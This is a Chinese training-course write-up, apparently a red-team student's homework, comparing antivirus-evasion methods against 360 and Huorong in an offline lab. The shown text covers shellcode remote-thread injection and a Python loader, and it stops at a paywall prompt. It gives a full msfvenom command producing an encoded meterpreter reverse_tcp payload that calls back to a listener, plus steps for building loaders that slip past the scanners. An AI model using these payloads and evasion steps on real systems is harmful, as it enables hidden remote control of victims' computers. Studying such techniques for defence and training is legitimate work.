本文是红队培训班的作业分享,对比了四种免杀技术:Shellcode远程线程注入、Python加载器、无文件落地免杀和掩日免杀框架,通过360和火绒安全软件的测试。结果表明,只有Shellcode远程线程注入生成的EXE文件成功通过了两大杀毒软件的免杀检测。
文章来源|MS08067 红队培训班第12节课作业
本文作者:汤浩荡(红队培训班1期学员)
按老师要求尝试完成布置的作业如下:
环境准备:
Kali linux安装cs4.2,Windows7系统安装火绒杀毒和360杀毒,为测试免杀并且防止联网查杀,关闭网络连接。
一.Shellcode远程线程注入
1.msf生成c语言木马
msfvenom --list encoder
//查看编码模块,经过测试x86和x64均不能使用,会导致无法上线
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.12.145 lport=4444 -e cmd/powershell_base64 -i 5 -f c -o 2.c
//-e指定编码方式,-i编码次数,-f指定生成文件类型
2.复制shellcode内容,使用加载器中远程线程注入.c生成免杀处理码 Gedit 1.c
//编辑生成的c语言木马,复制shellcode
使用vs2019建立项目,并生成源.cpp(内容为远程线程注入.c),替换shellcode,并将编译运行库替换为mt多线程。
3.将所生成的免杀码进行免杀测试,结果如下:
免杀通过!
二.python加载器
本免杀方式继续使用之前生成的shellcode,使用notepad++替换掉双引号、\x和\r\n
而后替换掉加载器中的shellcode部分,如下图:
使用pyinstaller将py文件生成为exe文件
复制该exe文件使用火绒和360进行免杀测试,结果如下:
该方法火绒免杀失败
最低0.47元/天 解锁文章
扫一扫
2231
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
